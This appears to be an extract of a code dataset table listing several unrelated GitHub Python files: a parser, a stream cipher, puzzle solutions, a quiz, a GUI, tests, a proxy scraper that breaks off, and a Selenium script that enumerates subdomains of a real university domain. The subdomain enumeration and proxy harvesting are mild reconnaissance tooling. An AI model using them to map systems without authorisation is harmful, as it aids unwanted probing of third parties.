seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
18617757117 | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
    """Discover subdomains of a domain via hackertarget.com's DNS host-record search.

    Drives a real browser (Selenium) because the lookup form is submitted
    client-side.
    """
    def __init__(self, domain):
        """
        Initialise basic state.

        :param domain: the target domain to scan
        """
        self.domain = domain
        self.session = requests.Session()
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.8',
            'Accept-Encoding': 'gzip',
        }
    def get_by_hackertarget(self):
        """Query hackertarget.com and return a list of discovered subdomains."""
        subdomains = []
        base_url = "https://hackertarget.com/find-dns-host-records/"
        #driver = webdriver.Chrome()
        driver = webdriver.Firefox()  # launch the browser
        try:
            driver.get(base_url)  # open the search page
            # Locate the query field by name, enter the domain, submit with Enter.
            query_box = driver.find_element_by_name("theinput")
            query_box.send_keys(self.domain)
            query_box.send_keys(Keys.ENTER)
            time.sleep(3)  # give the result panel time to render
            text = driver.find_element_by_id("formResponse").text  # hostnames and IPs
            # Capture whatever precedes the domain on each matching line.
            # re.escape keeps the dots in the domain from matching arbitrary chars.
            link_regx = re.compile('(.*?)' + re.escape(self.domain))
            links = link_regx.findall(text)
            try:
                for link in links:
                    if not link.startswith('http'):
                        link = "http://" + link + self.domain
                    subdomain = urlparse(link).netloc
                    if subdomain not in subdomains and subdomain != self.domain:
                        subdomains.append(subdomain.strip())
            except Exception:
                pass
            return subdomains
        finally:
            # Bug fix: quit() used to sit after the return statement and never
            # ran, leaking one browser process per call.
            driver.quit()
def main(domain):
    """
    Entry point: fetch and return the subdomains of *domain*.

    :param domain: target domain name
    :return: list of subdomains found by the hackertarget lookup
    """
    scanner = DnsRecord(domain)
    return scanner.get_by_hackertarget()
if __name__ == '__main__':
# 自己在这个文件里尝试好,能获取子域名就提交上来
print(main("hubu.edu.cn")) # 输出hubu.edu.com的子域名 | b1ackc4t/getdomain | module/passive/dns_record.py | dns_record.py | py | 2,542 | python | en | code | 3 | github-code | 36 |
21218564854 | from aocd import lines, submit
ans = 0
test = False
gamma = 0
eps = 0
# c[pos] = [count of '0's, count of '1's] seen in column pos.
c = []
if test:
    with open("test.txt", "r") as f:
        lines = f.readlines()
# Tally the bit frequencies column by column.
for line in [l.strip() for l in lines if l]:
    for pos, ch in enumerate(line):
        while len(c) <= pos:
            c.append([0, 0])
        c[pos][int(ch)] += 1
# gamma takes the majority bit per column, eps the minority bit.
width = len(c)
for pos, (zeros, ones) in enumerate(c):
    x = 1 if ones > zeros else 0
    print(x)
    shift = width - pos - 1
    gamma = gamma | (x << shift)
    y = 1 if ones < zeros else 0
    eps = eps | (y << shift)
ans = gamma * eps
print(gamma, eps, ans)
submit(ans) | benpm/advent-of-code-2021 | original_solutions/day_03/day_03.py | day_03.py | py | 633 | python | en | code | 0 | github-code | 36 |
43767527613 | # -*- coding: utf-8 -*-
# @Time : 2020/8/21 17:18
# @Author : WuatAnt
# @File : 5-5.py
# @Project : Python数据结构与算法分析
def hash(string, tablesize):
    """
    Simple "folding" hash for a string: sum of code points, modulo table size.

    Note: the name intentionally mirrors the book's example and shadows the
    builtin ``hash``; kept for interface compatibility.

    :param string: the string to hash
    :param tablesize: size of the hash table
    :return: slot index in ``[0, tablesize)``
    """
    # ord(): Return the Unicode code point for a one-character string.
    # (The original accumulated into a local named ``sum``, shadowing the builtin.)
    total = sum(ord(ch) for ch in string)
    return total % tablesize
27764760485 | import ply.yacc as yacc
from anytree import Node
from lex import Lexer
class Parser():
    """LALR parser (ply.yacc) for the TPP language.

    Each ``p_*`` method's docstring IS the grammar rule ply compiles, so those
    docstrings must not be reworded.  Every rule builds an anytree ``Node``;
    terminal nodes carry ``line``/``column`` attributes, with line numbers
    re-based against ``self.totalLines``.
    """
    # Tokens produced by the lexical-analysis stage.
    tokens = Lexer.tokens
    def __init__(self, **kwargs):
        self.totalLines = 0        # set by syntactic(); used to re-base line numbers
        self.result = True         # flipped to False by p_error
        self.lexer = Lexer()
        self.parser = yacc.yacc(module=self, **kwargs)
    def f_column(self, token, pos):
        """Return the 1-based column of symbol *pos* within production *token*."""
        source = token.lexer.lexdata
        line_start = source.rfind('\n', 0, token.lexpos(pos)) + 1
        return (token.lexpos(pos) - line_start) + 1
    def p_programa(self, p):
        '''
        programa : lista_declaracoes
        '''
        p[0] = Node('programa', value = 'programa', children = [p[1]])
    def p_lista_declaracoes(self, p):
        '''
        lista_declaracoes : lista_declaracoes declaracao
                        | declaracao
        '''
        if(len(p) == 3):
            p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1],p[2]])
        else:
            p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1]])
    def p_declaracao(self, p):
        '''
        declaracao : declaracao_variaveis
                    | inicializacao_variaveis
                    | declaracao_funcao
        '''
        p[0] = Node('declaracao', value = 'declaracao', children = [p[1]])
    def p_declaracao_variaveis(self, p):
        '''
        declaracao_variaveis : tipo DOIS_PONTOS lista_variaveis
        '''
        p[0] = Node('declaracao_variaveis', value = 'declaracao_variaveis', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3]
        ])
    def p_inicializacao_variaveis(self, p):
        '''
        inicializacao_variaveis : atribuicao
        '''
        p[0] = Node('inicializacao_variaveis', value = 'inicializacao_variaveis', children = [p[1]])
    def p_lista_variaveis(self, p):
        '''
        lista_variaveis : lista_variaveis VIRGULA var
                        | var
        '''
        if(len(p) == 4):
            p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [p[1]])
    def p_var(self, p):
        '''
        var : ID
            | ID indice
        '''
        if(len(p) == 3):
            p[0] = Node('var', value = 'var', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2]
            ])
        else:
            p[0] = Node('var', value = 'var', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
            ])
    def p_indice(self, p):
        '''
        indice : indice ABRE_COLCHETE expressao FECHA_COLCHETE
                | ABRE_COLCHETE expressao FECHA_COLCHETE
        '''
        if(len(p) == 5):
            p[0] = Node('indice', value = 'indice', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3],
                Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
            ])
        else:
            p[0] = Node('indice', value = 'indice', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
            ])
    def p_tipo(self, p):
        '''
        tipo : INTEIRO
            | FLUTUANTE
        '''
        p[0] = Node('tipo', value = 'tipo', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_declaracao_funcao(self, p):
        '''declaracao_funcao : tipo cabecalho
                            | cabecalho'''
        if(len(p) == 3):
            p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [p[1]])
    def p_cabecalho(self, p):
        '''cabecalho : ID ABRE_PARENTESE lista_parametros FECHA_PARENTESE corpo FIM'''
        p[0] = Node('cabecalho', value = 'cabecalho', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4)),
            p[5]
        ])
    def p_lista_parametros(self, p):
        '''
        lista_parametros : lista_parametros VIRGULA parametro
                        | parametro
                        | vazio
        '''
        if(len(p) == 4):
            p[0] = Node('lista_parametros', value = 'lista_parametros', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            # ``vazio`` yields None: build a childless node in that case.
            if(p[1] is not None):
                p[0] = Node('lista_parametros', value = 'lista_parametros', children = [p[1]])
            else:
                p[0] = Node('lista_parametros', value = 'lista_parametros')
    def p_parametro(self, p):
        '''
        parametro : tipo DOIS_PONTOS ID
                | parametro ABRE_COLCHETE FECHA_COLCHETE
        '''
        p[0] = Node('parametro', value = 'parametro', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
        ])
    def p_corpo(self, p):
        '''
        corpo : corpo acao
            | vazio
        '''
        if(len(p) == 3):
            p[0] = Node('corpo', value = 'corpo', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('corpo', value = 'corpo')
    def p_acao(self, p):
        '''
        acao : expressao
            | declaracao_variaveis
            | se
            | repita
            | leia
            | escreva
            | retorna
        '''
        p[0] = Node('acao', value = 'acao', children = [p[1]])
    def p_se(self, p):
        '''
        se : SE expressao ENTAO corpo FIM
        | SE expressao ENTAO corpo SENAO corpo FIM
        '''
        if(len(p) == 6):
            p[0] = Node('condicional', value = 'condicional', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
                p[4],
                Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5))
            ])
        else:
            p[0] = Node('condicional', value = 'condicional', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
                p[4],
                Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5)),
                p[6],
                Node(str(p[7]), value = str(p[7]), line = (p.lineno(7) - (self.totalLines - 1)), column = self.f_column(p, 7))
            ])
    def p_repita(self, p):
        '''
        repita : REPITA corpo ATE expressao
        '''
        p[0] = Node('repita', value = 'repita', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            p[2],
            Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
            p[4]
        ])
    def p_atribuicao(self, p):
        '''
        atribuicao : var ATRIBUICAO expressao
        '''
        p[0] = Node('atribuicao', value = 'atribuicao', children = [
            p[1],
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3]
        ])
    def p_leia(self, p):
        '''
        leia : LEIA ABRE_PARENTESE var FECHA_PARENTESE
        '''
        p[0] = Node('leia', value = 'leia', children = [
            # Bug fix: the LEIA keyword node previously took value=str(p[2])
            # (the parenthesis), an apparent copy-paste from p_escreva.
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])
    def p_escreva(self, p):
        '''
        escreva : ESCREVA ABRE_PARENTESE expressao FECHA_PARENTESE
        '''
        p[0] = Node('escreva', value = 'escreva', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])
    def p_retorna(self, p):
        '''
        retorna : RETORNA ABRE_PARENTESE expressao FECHA_PARENTESE
        '''
        p[0] = Node('retorna', value = 'retorna', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])
    def p_expressao(self, p):
        '''
        expressao : expressao_logica
                | atribuicao
        '''
        p[0] = Node('expressao', value = 'expressao', children = [p[1]])
    def p_expressao_logica(self, p):
        '''
        expressao_logica : expressao_simples
                        | expressao_logica operador_logico expressao_simples
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_logica', value = 'expressao_logica', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_logica', value = 'expressao_logica', children = [p[1]])
    def p_expressao_simples(self, p):
        '''
        expressao_simples : expressao_aditiva
                        | expressao_simples operador_relacional expressao_aditiva
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_simples', value = 'expressao_simples', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_simples', value = 'expressao_simples', children = [p[1]])
    def p_expressao_aditiva(self, p):
        '''
        expressao_aditiva : expressao_multiplicativa
                        | expressao_aditiva operador_soma expressao_multiplicativa
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [p[1]])
    def p_expressao_multiplicativa(self, p):
        '''
        expressao_multiplicativa : expressao_unaria
                                | expressao_multiplicativa operador_multiplicacao expressao_unaria
        '''
        if(len(p) == 4):
            p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [
                p[1],
                p[2],
                p[3]
            ])
        else:
            p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [p[1]])
    def p_expressao_unaria(self, p):
        '''
        expressao_unaria : fator
                        | operador_soma fator
                        | operador_negacao fator
        '''
        # NOTE(review): value is 'expressao_unitaria' (typo?) while the node name
        # is 'expressao_unaria'; kept as-is in case downstream passes match on it.
        if(len(p) == 3):
            p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [
                p[1],
                p[2]
            ])
        else:
            p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [p[1]])
    def p_operador_relacional(self, p):
        '''
        operador_relacional : MENOR
                            | MAIOR
                            | IGUAL
                            | DIFERENTE
                            | MENOR_IGUAL
                            | MAIOR_IGUAL
        '''
        p[0] = Node('operador_relacional', value = 'operador_relacional', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_operador_soma(self, p):
        '''
        operador_soma : MAIS
                    | MENOS
        '''
        p[0] = Node('operador_soma', value = 'operador_soma', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_operador_logico(self, p):
        '''
        operador_logico : E_LOGICO
                        | OU_LOGICO
        '''
        p[0] = Node('operador_logico', value = 'operador_logico', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_operador_negacao(self, p):
        '''
        operador_negacao : NEGACAO
        '''
        p[0] = Node('operador_negacao', value = 'operador_negacao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_operador_multiplicacao(self, p):
        '''
        operador_multiplicacao : MULTIPLICACAO
                            | DIVISAO
        '''
        p[0] = Node('operador_multiplicacao', value = 'operador_multiplicacao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_fator(self, p):
        '''
        fator : ABRE_PARENTESE expressao FECHA_PARENTESE
            | var
            | chamada_funcao
            | numero
        '''
        if(len(p) == 4):
            p[0] = Node('fator', value = 'fator', children = [
                Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
                p[2],
                Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
            ])
        else:
            p[0] = Node('fator', value = 'fator', children = [p[1]])
    def p_numero(self, p):
        '''
        numero : NUM_INTEIRO
            | NUM_PONTO_FLUTUANTE
            | NUM_NOTACAO_CIENTIFICA
        '''
        p[0] = Node('numero', value = 'numero', children = [
            Node(str(p[1]), value = p[1], line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
        ])
    def p_chamada_funcao(self, p):
        '''
        chamada_funcao : ID ABRE_PARENTESE lista_argumentos FECHA_PARENTESE
        '''
        p[0] = Node('chamada_funcao', value = 'chamada_funcao', children = [
            Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
            Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
            p[3],
            Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
        ])
    def p_lista_argumentos(self, p):
        '''
        lista_argumentos : lista_argumentos VIRGULA expressao
                        | expressao
                        | vazio
        '''
        if(len(p) == 4):
            p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [
                p[1],
                Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
                p[3]
            ])
        else:
            if(p[1] is not None):
                p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [p[1]])
            else:
                p[0] = Node('lista_argumentos', value = 'lista_argumentos')
    def p_vazio(self, p):
        '''
        vazio :
        '''
        pass
    def p_error(self, p):
        """ply error hook: record the failure and report token position."""
        self.result = False
        if p:
            print('Sintaxe Inválida do token \'' + str(p.value) + '\' em ' + str(p.lineno) + ':' + str(self.lexer.f_column(p)))
        else:
            print('Sintaxe Inválida da saída')
    def syntactic(self, codeFile, numberOfLines):
        """Parse *codeFile* and return (syntax tree, success flag)."""
        self.totalLines = numberOfLines
        self.tree = self.parser.parse(codeFile, tracking = True)
        return self.tree, self.result
35580246140 | import sys
import datetime
import os
class StreamCipherUtil:
    """Stream cipher: XORs each character with an 8-bit keystream value drawn
    from a Lehmer (Park-Miller style) PRNG seeded by a hash of the key.

    Encryption and decryption are the same operation.
    """
    def __init__(self, input_file, output_file, key):
        self.key = key                     # key material (sequence of ints)
        self.output_file = output_file
        self.input_file = input_file
        self.exec_time = None              # duration of the last crypt_stream run
        self.text_len = 0                  # characters written so far
        self.bit_stream = self._pm_rand()  # infinite '0'/'1' generator
        self.bit_len = 8                   # keystream bits consumed per character
        self.file_text_len = os.stat(self.input_file).st_size

    @staticmethod
    def progress_bar(count, total, suffix=''):
        """Render a simple in-place console progress bar."""
        bar_len = 60
        filled_len = int(round(bar_len * count / float(total)))
        percents = round(100.0 * count / float(total), 1)
        bar = '=' * filled_len + '-' * (bar_len - filled_len)
        sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix))
        sys.stdout.flush()

    def _pm_rand(self):
        """Yield an endless stream of '0'/'1' characters.

        Lehmer-style generator: x_{n+1} = 16807 * x_n mod (2**31 - 1); one bit
        is emitted per step depending on which half of the range x lands in.
        """
        IA = 16807          # multiplier
        IM = 2147483647     # modulus, 2**31 - 1
        threshold = (2 ** 31 - 1) // 2
        value = IA * self.hash_key() % IM
        while True:
            value = IA * value % IM
            yield '0' if value < threshold + 1 else '1'

    def gen_custom_prng_bit_seq(self):
        """Consume ``bit_len`` keystream bits and return them as an int."""
        bits = ''.join(next(self.bit_stream) for _ in range(self.bit_len))
        return int(bits, 2)

    def crypt_stream(self, text_stream):
        """XOR every character of *text_stream* with the keystream (generator).

        ``exec_time`` is recorded once the generator has been exhausted.
        """
        start = datetime.datetime.now()
        for ch in text_stream:
            yield chr(ord(ch) ^ self.gen_custom_prng_bit_seq())
        stop = datetime.datetime.now()
        self.exec_time = stop - start

    def hash_key(self):
        """Derive the PRNG seed (< 2**31 - 1) from the key via SHA-256."""
        import hashlib
        return int(hashlib.sha256(str(self.key).encode('utf-16')).hexdigest(), 16) % (2 ** 31 - 1)

    def read_from_file(self):
        """Return the whole input file (newline translation disabled)."""
        # The with-block closes the file; the explicit close() calls and the
        # dead ``text = ""`` initialiser from the original were removed.
        with open(self.input_file, 'r', newline='') as f:
            return f.read()

    def write_to_file(self, text):
        """Write *text* character by character, updating the progress bar."""
        with open(self.output_file, 'w', newline='') as f:
            for index, ch in enumerate(text):
                f.write(ch)
                self.progress_bar(index, self.file_text_len)
                self.text_len += 1
if __name__ == '__main__':
    # Interactive driver: prompt for mode/files/key and run the cipher.
    # (The banner says RC4 but the class implements a custom PRNG stream cipher.)
    print("RC4 Encryption/Decryption utility.\n")
    while True:
        try:
            mode = int(input("Choose mode: \n1. Encryption\n2. Decryption\nEnter mode: "))
            # Bug fix: invalid modes used to fall through and crash on
            # write_to_file(None); reject them up front.
            if mode not in (1, 2):
                print("\nUnknown mode, please choose 1 or 2.\n")
                continue
            input_filename = input("Enter input filename: ")
            output_filename = input("Enter output filename: ")
            key = input("Enter key [0-9a-zA-Zа-яА-Я]: ")
            s = StreamCipherUtil(key=[ord(ch) for ch in key], input_file=input_filename,
                                 output_file=output_filename)
            data_stream = s.read_from_file()
            # Encryption and decryption are the same XOR pass for a stream
            # cipher, so both modes take the identical path.  ('mode is 1'
            # was replaced: identity comparison on ints is implementation-defined.)
            new_data_stream = s.crypt_stream(data_stream)
            s.write_to_file(new_data_stream)
            print("\nTime {0} chars/ms".format((s.exec_time.seconds*10**6+s.exec_time.microseconds)/s.text_len))
        except KeyboardInterrupt:
            print("\nQuit utility.Bye!\n")
            break
        except ValueError as e:
            print("\nError occured! {0}\n".format(e.args))
class Solution:
    def numRollsToTarget(self, d: int, f: int, target: int) -> int:
        """Count the sequences of d rolls of an f-sided die that sum to
        target, modulo 10**9 + 7 (LeetCode 1155), via bottom-up DP."""
        # ways[t] = number of ways the dice processed so far sum to t
        ways = [0] * (target + 1)
        ways[0] = 1
        for _ in range(d):
            nxt = [0] * (target + 1)
            for t in range(1, target + 1):
                # The last die shows some face v in 1..f, leaving t - v
                # for the earlier dice: sum ways[max(t - f, 0) .. t - 1].
                nxt[t] = sum(ways[max(t - f, 0):t])
            ways = nxt
        return ways[target] % (10 ** 9 + 7)
37403961227 | from regression_tests import *
class TestPlain(Test):
    """Verbose plain-text fileinfo run over file-32bit.ex_."""
    settings = TestSettings(tool='fileinfo', args='--verbose', input='file-32bit.ex_')

    def test_fileinfo_version_string_present(self):
        """The verbose output must advertise the fileinfo version and build date."""
        self.assertRegex(self.fileinfo.output, r'RetDec Fileinfo version : RetDec .* built on .*')
class TestJson(Test):
    """Verbose JSON fileinfo run over file-32bit.ex_."""
    settings = TestSettings(tool='fileinfo', args='--verbose --json', input='file-32bit.ex_')

    def test_fileinfo_version_info_present(self):
        """The JSON output must carry non-empty version metadata."""
        version = self.fileinfo.output['fileinfoVersion']
        self.assertTrue(version['commitHash'])
        self.assertTrue(version['versionTag'])
        self.assertTrue(version['buildDate'])
10415944432 |
print("Welcome to the quiz")
print("type 'stop' to exit\n")

# Fixed control flow: the original set run = False after most correct answers
# (ending the quiz early), asked the coffee question twice, and question 2's
# check 'answer == "Sus" or "sus"' was always true.
run = True
question = 1
while run:
    if question == 1:
        answer = input("\nIs cheetah the fastest animal in the world?Yes or No?(Land, water, air)\n:")
        if answer == "Yes":
            print("\nIt is false.The peregrine falcon is the fastest animal")
            question = 2
        elif answer == "No":
            print("\nYou are correct.\n")
            print("Next question")
            question = 2
        elif answer == "stop":
            print("\n\nThanks for attempting, Bye.")
            run = False
        else:
            print("\nError, please try again.")
    elif question == 2:
        answer = input("\nWhat is the scientific name of Pig?\n:")
        if answer in ("Sus", "sus"):
            print("\nYou are correct")
            print("\nNext question")
            question = 3
        elif answer == "stop":
            print("\nThanks for attempting. Bye")
            run = False
        else:
            print("\nYou are wrong, please try again")
    elif question == 3:
        answer = input("\nWhich country produces the most coffee?")
        if answer == "Brazil":
            print("\nYou are correct")
            print("\nNext question")
            question = 4
        elif answer == "stop":
            print("\nThanks for attempting. Bye")
            run = False
        else:
            print("\nYou are wrong, please try again")
    elif question == 4:
        answer = input("\nWhat is the capital of Switzerland?\n:")
        if answer == "Bern":
            print("\nYou are correct")
            print("\nNext question")
            question = 5
        elif answer == "stop":
            print("\nThanks for attempting. Bye")
            run = False
        else:
            print("\nYou are wrong, please try again")
    elif question == 5:
        answer = input("\nWhich is the fastest car in the world?(Exact name)?")
        if answer == "Bugatti Chiron Super Sport 300+":
            print("\nYou are correct")
            print("\nThat was the last question, well done!")
            run = False
        elif answer == "stop":
            print("\nThanks for attempting. Bye")
            run = False
        else:
            print("\nYou are wrong, please try again")
| ojasprogramer/python | Tanmay's quiz.py | Tanmay's quiz.py | py | 2,906 | python | en | code | 0 | github-code | 36 |
1777450651 | import spacy
# Load the small English pipeline.
nlp = spacy.load('en_core_web_sm')

# Read the previously scraped website text.
with open('website_text.txt', 'r') as f:
    text = f.read()

# Run the NLP pipeline and pull out one trimmed string per sentence.
doc = nlp(text)
sentences = [s.text.strip() for s in doc.sents]
print(sentences)
| anupshrestha7171/FinalTaskOnMentorFriends | Qn2.py | Qn2.py | py | 341 | python | en | code | 0 | github-code | 36 |
24340323309 | from PySide2.QtWidgets import QApplication
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
import DCT,DFT,histogram_equalization,gray,nose,buguize,duishu,gamma,test_fenge,test_kuang,test_face3,junzhi
class Stats:
    """Main window controller: loads GUI1.ui and runs whichever
    image-processing operations are checked when the run button is clicked."""
    def __init__(self):
        # NOTE(review): the QFile is closed again before being handed to
        # QUiLoader().load() -- confirm the loader re-opens it by path itself.
        qufile_stats=QFile('GUI1.ui')
        qufile_stats.open(QFile.ReadOnly)
        qufile_stats.close()
        self.ui = QUiLoader().load(qufile_stats)
        self.ui.runButton.clicked.connect(self.run)
    def path(self):
        """Open a file dialog and return the path of the chosen image."""
        from PySide2.QtWidgets import QFileDialog
        filePath, _ = QFileDialog.getOpenFileName(
            self.ui,  # parent window object
            "选择你的图片",  # dialog title ("choose your image")
            r"d:\\data",  # starting directory
            "图片类型 (*.png *.jpg *.bmp)"  # file-type filter ("image types")
        )
        return (filePath)
    def run(self):
        """Run every checked operation.

        Each call to self.path() opens its own file dialog, so several
        checked boxes will prompt for a file several times in a row.
        """
        if self.ui.DCTButton.isChecked():
            DCT.DCT1(self.path())
        if self.ui.DFTButton.isChecked():
            DFT.DFT1(self.path())
        if self.ui.zhifangButton.isChecked():
            histogram_equalization.his_eq(self.path())
        if self.ui.noseButton.isChecked():
            nose.addnoise(self.path())
        if self.ui.grayButton.isChecked():
            gray.gray1(self.path())
        if self.ui.buguize.isChecked():
            buguize.buguize(self.path())
        if self.ui.duishu.isChecked():
            # NOTE(review): this branch calls buguize.buguize like the branch
            # above -- it probably should dispatch to the duishu module
            # (imported at the top of the file); confirm before changing.
            buguize.buguize(self.path())
        if self.ui.gamma.isChecked():
            gamma.gamma(self.path())
        if self.ui.junzhi.isChecked():
            junzhi.junzhi(self.path())
        if self.ui.face.isChecked():
            test_face3.face(self.path())
        if self.ui.fenge.isChecked():
            test_fenge.fenge(self.path())
        if self.ui.kuang.isChecked():
            test_kuang.kuang(self.path())
# Application bootstrap: build the Qt app and show the main window
# (app.exec_() on the following line enters the event loop).
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_() | lightning-skyz/test1 | GUI.py | GUI.py | py | 1,906 | python | en | code | 0 | github-code | 36 |
37695484761 | from random import randint
from concurrent.futures import ThreadPoolExecutor as pool
import random
import os
import subprocess
import re
import requests
import json
import time
class Prox:
    """Scrape public proxy lists and keep the proxies that answer a probe request."""
    def __init__(self):
        self.alive = []       # proxies that passed the liveness probe
        self.unfiltered = []  # every "ip:port" string scraped so far
        self.get_proxy('https://free-proxy-list.net')
